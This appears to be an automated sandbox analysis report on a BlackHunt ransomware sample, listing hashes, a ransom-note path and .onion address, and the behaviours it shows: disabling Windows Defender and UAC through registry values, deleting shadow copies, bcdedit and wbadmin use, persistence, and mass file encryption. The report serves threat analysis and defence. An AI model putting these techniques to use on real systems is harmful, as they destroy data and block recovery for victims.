Analysis
-
max time kernel
170s -
max time network
187s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:28
Static task
static1
Behavioral task
behavioral1
Sample
5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe
Resource
win10v2004-20231215-en
General
-
Target
5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe
-
Size
707KB
-
MD5
3f61440941303e3d7cd69e2f8479549b
-
SHA1
d0b5a179e0c4e4f55fa64892b460ae61769494c6
-
SHA256
5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e
-
SHA512
68cfe05138b2ec7c86947b3adda3b6b503269bdf667ee215a6d4c0ad8bffbc1ff15087f602367becfdc579085b3d7b569c38b62f300064008370457f6f04a680
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1n8ovnh:6uaTmkZJ+naie5OTamgEoKxLW2Wh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4416 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection Conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5044 bcdedit.exe 996 bcdedit.exe -
Renames multiple (802) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3232 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\R: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\O: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\P: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\A: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\X: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\J: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\B: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\M: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\W: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\H: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\K: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\Z: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\Q: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\T: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\S: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\G: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\L: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\V: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\E: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\Y: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened (read-only) \??\I: 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\santuario.md 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_Private.key 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jpeg.md 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\tesselate.x3d 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\resources.jar 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_Private.key 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#BlackHunt_Private.key 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_TW.properties 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\zipfs.jar 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_chroma\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jmc.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\santuario.md 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\#BlackHunt_Private.key 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#BlackHunt_Private.key 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#BlackHunt_Private.key 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\is\#BlackHunt_Private.key 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\directshow.md 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\colorimaging.md 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\dnsns.jar 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\#BlackHunt_Private.key 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\#BlackHunt_Private.key 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\natives_blob.bin 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\Google\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterBold.ttf 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CollectSignatures.aapp 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\glib.md 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\Java\jre-1.8\legal\javafx\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_ReadMe.hta 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\#BlackHunt_ReadMe.txt 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\#BlackHunt_Private.key 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe File opened for modification C:\Program Files\GroupMove.asp 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4320 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1604 vssadmin.exe 4024 vssadmin.exe 3848 vssadmin.exe 4068 vssadmin.exe 3536 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 wbengine.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ wbengine.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe Token: SeRestorePrivilege 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe Token: SeBackupPrivilege 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe Token: SeTakeOwnershipPrivilege 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe Token: SeAuditPrivilege 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe Token: SeSecurityPrivilege 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe Token: SeIncBasePriorityPrivilege 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe Token: SeBackupPrivilege 2500 vssvc.exe Token: SeRestorePrivilege 2500 vssvc.exe Token: SeAuditPrivilege 2500 vssvc.exe Token: SeBackupPrivilege 4044 wbengine.exe Token: SeRestorePrivilege 4044 wbengine.exe Token: SeSecurityPrivilege 4044 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3368 wrote to memory of 3276 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 89 PID 3368 wrote to memory of 3276 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 89 PID 3368 wrote to memory of 1672 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 90 PID 3368 wrote to memory of 1672 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 90 PID 3368 wrote to memory of 4764 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 93 PID 3368 wrote to memory of 4764 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 93 PID 3368 wrote to memory of 484 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 174 PID 3368 wrote to memory of 484 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 174 PID 3368 wrote to memory of 4368 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 95 PID 3368 wrote to memory of 4368 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 95 PID 3276 wrote to memory of 1056 3276 cmd.exe 100 PID 3276 wrote to memory of 1056 3276 cmd.exe 100 PID 1672 wrote to memory of 2452 1672 cmd.exe 99 PID 1672 wrote to memory of 2452 1672 cmd.exe 99 PID 484 wrote to memory of 1524 484 reg.exe 101 PID 484 wrote to memory of 1524 484 reg.exe 101 PID 4368 wrote to memory of 5068 4368 cmd.exe 102 PID 4368 wrote to memory of 5068 4368 cmd.exe 102 PID 4764 wrote to memory of 4044 4764 cmd.exe 103 PID 4764 wrote to memory of 4044 4764 cmd.exe 103 PID 3368 wrote to memory of 1560 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 184 PID 3368 wrote to memory of 1560 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 184 PID 3368 wrote to memory of 4032 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 106 PID 3368 wrote to memory of 4032 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 106 PID 3368 wrote to memory of 1864 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 108 PID 3368 wrote to memory of 1864 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 108 PID 3368 wrote to memory of 3960 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 109 PID 3368 wrote to memory of 3960 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 109 PID 3368 wrote to memory of 2872 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 112 PID 3368 wrote to memory of 2872 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 112 PID 3368 wrote to memory of 1976 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 114 PID 3368 wrote to memory of 1976 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 114 PID 1560 wrote to memory of 2772 1560 Conhost.exe 115 PID 1560 wrote to memory of 2772 1560 Conhost.exe 115 PID 4032 wrote to memory of 3608 4032 cmd.exe 180 PID 4032 wrote to memory of 3608 4032 cmd.exe 180 PID 3368 wrote to memory of 564 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 118 PID 3368 wrote to memory of 564 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 118 PID 3368 wrote to memory of 2284 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 120 PID 3368 wrote to memory of 2284 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 120 PID 3960 wrote to memory of 2888 3960 cmd.exe 122 PID 3960 wrote to memory of 2888 3960 cmd.exe 122 PID 3368 wrote to memory of 4516 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 123 PID 3368 wrote to memory of 4516 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 123 PID 3368 wrote to memory of 1604 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 199 PID 3368 wrote to memory of 1604 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 199 PID 1864 wrote to memory of 896 1864 cmd.exe 127 PID 1864 wrote to memory of 896 1864 cmd.exe 127 PID 3368 wrote to memory of 1200 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 128 PID 3368 wrote to memory of 1200 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 128 PID 1976 wrote to memory of 3788 1976 cmd.exe 129 PID 1976 wrote to memory of 3788 1976 cmd.exe 129 PID 2872 wrote to memory of 3832 2872 cmd.exe 131 PID 2872 wrote to memory of 3832 2872 cmd.exe 131 PID 2284 wrote to memory of 4676 2284 cmd.exe 187 PID 2284 wrote to memory of 4676 2284 cmd.exe 187 PID 3368 wrote to memory of 1632 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 134 PID 3368 wrote to memory of 1632 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 134 PID 564 wrote to memory of 4860 564 cmd.exe 135 PID 564 wrote to memory of 4860 564 cmd.exe 135 PID 1604 wrote to memory of 3500 1604 vssadmin.exe 136 PID 1604 wrote to memory of 3500 1604 vssadmin.exe 136 PID 3368 wrote to memory of 1636 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 137 PID 3368 wrote to memory of 1636 3368 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe 137 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe"C:\Users\Admin\AppData\Local\Temp\5a92e22d4007fe5419df39f1df374c5291b5726f25c38381b6bd5ba05fe4146e.exe"1⤵
